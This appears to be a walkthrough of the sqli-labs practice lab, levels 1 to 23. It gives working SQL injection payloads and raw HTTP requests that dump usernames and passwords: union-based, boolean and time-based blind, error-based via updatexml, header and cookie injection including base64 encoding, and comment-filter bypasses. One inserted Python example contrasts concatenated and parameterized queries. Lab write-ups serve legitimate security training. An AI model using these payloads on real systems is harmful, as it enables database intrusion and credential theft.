Less-1
payload:'+and+1=2+union+select+1,username,password+from+security.users+limit 0,1--+
Level 1 is a standard string-type SQL injection: a single quote triggers an error, and the usual injection works.
Less-2
payload:+and+1=2+union+select+1,username,password+from+security.users+limit 0,1--+
Level 2 is numeric-type SQL injection: append the payload directly. The injection point is confirmed with and 1=1 / and 1=2.
Less-3
payload:')+and+1=2+union+select+1,username,password+from+security.users+limit+0,1--+
Level 3 is string-type injection wrapped in parentheses; once the injection point is found, use the payload.
Less-4
payload:")+and+1=2+union+select+1,username,password+from+security.users+limit+0,1--+
Level 4 is string-type injection wrapped in parentheses.
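As an added illustration (not code from this walkthrough or from sqli-labs), here is the query-construction pattern behind Less-1 to Less-3 beside its parameterized fix, run against an in-memory SQLite stand-in for security.users with constructed data. The Less-4 double-quote context is left out because SQLite reads double quotes as identifiers rather than strings.

```python
import sqlite3

# How Less-1..3 embed the id value in the query: the prefixes of the page's payloads
# (' for Less-1, nothing for Less-2, ') for Less-3) mirror these contexts.
WRAPPERS = {"Less-1": "'{}'", "Less-2": "{}", "Less-3": "('{}')"}
CLOSERS = {"Less-1": "'", "Less-2": "", "Less-3": "')"}

# Payload tail from the walkthrough; table name adjusted to the stand-in schema.
UNION_TAIL = " and 1=2 union select 1,username,password from users limit 0,1-- "


def make_db():
    """Constructed in-memory stand-in for security.users (sample row, not lab data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users(id INTEGER, username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES(7, 'admin', 'constructed-secret')")
    return db


def vulnerable_lookup(db, level, user_id):
    """String-concatenated query: the same shape as the lab's WHERE id=... code."""
    sql = ("SELECT id, username, password FROM users WHERE id="
           + WRAPPERS[level].format(user_id) + " LIMIT 0,1")
    return db.execute(sql).fetchone()


def safe_lookup(db, user_id):
    """Parameterized query: the value is bound as data and cannot change the statement."""
    sql = "SELECT id, username, password FROM users WHERE id=? LIMIT 0,1"
    return db.execute(sql, (user_id,)).fetchone()


def payload_for(level):
    """The page's union payload, closed for the given level's quoting context."""
    return "1" + CLOSERS[level] + UNION_TAIL


def compare(level):
    """Return (row from concatenated query, row from parameterized query) for the payload."""
    db = make_db()
    payload = payload_for(level)
    return vulnerable_lookup(db, level, payload), safe_lookup(db, payload)


if __name__ == "__main__":
    for level in WRAPPERS:
        leaked, bound = compare(level)
        print(f"{level}: concatenated -> {leaked}, parameterized -> {bound}")
```

There is no row with id 1, so any row coming back from the concatenated query is the union's doing; the bound version returns nothing for the same input.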
Less-5
payload1 (probing length, using database() as the example): '+and+(select+length(database())=8)--+
payload2 (probing content, using database() as the example): '+and+(select+mid(database(),1,1)='s')--+
Boolean-based blind injection script: https://www.cnblogs.com/Spec/p/10648793.html
The script only dumps the database name; anything beyond that needs your own changes.
Less-6
payload1 (probing length, using database() as the example): "+and+(select+length(database())=8)--+
payload2 (probing content, using database() as the example): "+and+(select+mid(database(),1,1)='s')--+
Same as level 5; the script works with minor changes.
Less-7
payload1 (probing length, using database() as the example): '))+and+if((length(database())=8),sleep(3),1)--+
payload2 (probing content, using database() as the example): '))+and+if((mid(database(),1,1)='s'),sleep(3),1)--+
Time-based blind injection: the if statement does the test; if the condition is true the response is delayed 3 seconds, otherwise there is no delay.
Less-8
payload1 (probing length, using database() as the example): '+and+(select+length(database())=8)--+
payload2 (probing content, using database() as the example): '+and+(select+mid(database(),1,1)='s')--+
Same as level 5.
Less-9
payload1 (probing length, using database() as the example): '+and+if((length(database())=8),sleep(3),1)--+
payload2 (probing content, using database() as the example): '+and+if((mid(database(),1,1)='s'),sleep(3),1)--+
Same as level 7: single-quote string-type time-based blind injection.
Less-10
payload1 (probing length, using database() as the example): "+and+if((length(database())=8),sleep(3),1)--+
payload2 (probing content, using database() as the example): "+and+if((mid(database(),1,1)='s'),sleep(3),1)--+
Less-11
payload:
POST /sqli-labs/Less-11/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/sqli-labs/Less-11/?id=1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 79

uname=admin&passwd=123' and 1=2 union select username,password from security.users limit 0,1-- &submit=Submit
Standard POST injection; universal-password tricks and the like.
Less-12
payload:
POST /sqli-labs/Less-12/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/sqli-labs/Less-12/
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 110

uname=admin&passwd=123") and 1=2 union select username,password from security.users limit 0,1-- &submit=Submit
Less-13
poc:
POST /sqli-labs/Less-13/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/sqli-labs/Less-13/
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 74

uname=admin&passwd=123') or (select length(database())=8)-- &submit=Submit
POST-based boolean blind injection: the password field uses or to test true/false.
Less-14
poc:
POST /sqli-labs/Less-14/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/sqli-labs/Less-14/
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 67

uname=1&passwd=1" or (select length(database())=8)-- &submit=Submit
Same as level 13.
Less-15
payload:
POST /sqli-labs/Less-11/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/sqli-labs/Less-11/?id=1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 79

uname=admin&passwd=123' and 1=2 union select username,password from security.users limit 0,1-- &submit=Submit
Less-16
poc:
POST /sqli-labs/Less-16/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/sqli-labs/Less-16/
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 74

uname=admin&passwd=123") or (select length(database())=8)-- &submit=Submit
Less-17
poc:
POST /sqli-labs/Less-17/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/sqli-labs/Less-17/
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 100

uname=secure&passwd=admin' and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)-- &submit=Submit
Error-based injection. I had always used this payload before:
select count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a
but it never worked; only after reading the source did I learn that the input length is limited, so I used this payload instead:
updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)
and the error-based injection succeeded.
Less-18
poc:
POST /sqli-labs/Less-18/ HTTP/1.1
Host: localhost
User-Agent: ' or updatexml(1,concat(0x7e,(SELECT user()),0x7e),1) or '
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/sqli-labs/Less-18/
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 34

uname=admin&passwd=0&submit=Submit
Reading the source shows that the User-Agent is inserted into the database unfiltered, so an error-based payload is built: updatexml(1,concat(0x7e,(SELECT user()),0x7e),1), giving an SQL injection through the HTTP header.
Less-19
poc:
POST /sqli-labs/Less-19/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: ' or updatexml(1,concat(0x7e,(select user()),0x7e),1) or '
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 34

uname=admin&passwd=0&submit=Submit
Same as level 18, except that after logging in the Referer is echoed back, so the Referer value is modified and the error-based injection succeeds.
Less-20
poc:
GET /sqli-labs/Less-20/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: uname=admin' and 1=2 union select user(),version(),database()--+
Connection: close
Cookie injection: after logging in, the User-Agent, Referer and Cookie are all echoed to the page; refresh, capture the request, and replace the cookie with the payload.
Less-21
poc:
GET /sqli-labs/Less-21/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: uname=YWRtaW4nKSBhbmQgMT0yIHVuaW9uIHNlbGVjdCAxLHVzZXJuYW1lLHBhc3N3b3JkIGZyb20gc2VjdXJpdHkudXNlcnMgbGltaXQgMCwxIw==
Connection: close
The payload is base64-encoded, and the injection point is wrapped in a single quote plus parenthesis: ')
payload: admin') and 1=2 union select 1,username,password from security.users limit 0,1#
Less-22
poc:
GET /sqli-labs/Less-22/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: uname=YWRtaW4iIGFuZCAxPTIgdW5pb24gc2VsZWN0IDEsdXNlcm5hbWUscGFzc3dvcmQgZnJvbSBzZWN1cml0eS51c2VycyBsaW1pdCAwLDEtLSA=
Connection: close
payload: admin" and 1=2 union select 1,username,password from security.users limit 0,1--
Less-23
payload: ' and '1'='2' union select '1',username,password from security.users limit 0,1;%00
After several attempts it was fairly clear that # and -- are filtered, so a different comment method was tried: ;%00, and the comment worked.